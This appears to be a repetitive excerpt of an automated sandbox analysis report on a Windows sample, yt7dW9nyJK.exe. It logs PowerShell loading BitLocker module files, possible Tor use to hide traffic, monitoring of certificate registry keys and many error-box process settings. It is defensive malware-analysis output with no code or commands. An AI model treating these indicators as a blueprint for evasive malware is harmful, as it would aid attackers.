Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

May use the Tor software to hide its network traffic

Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp

Binary or memory string: onion-port

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
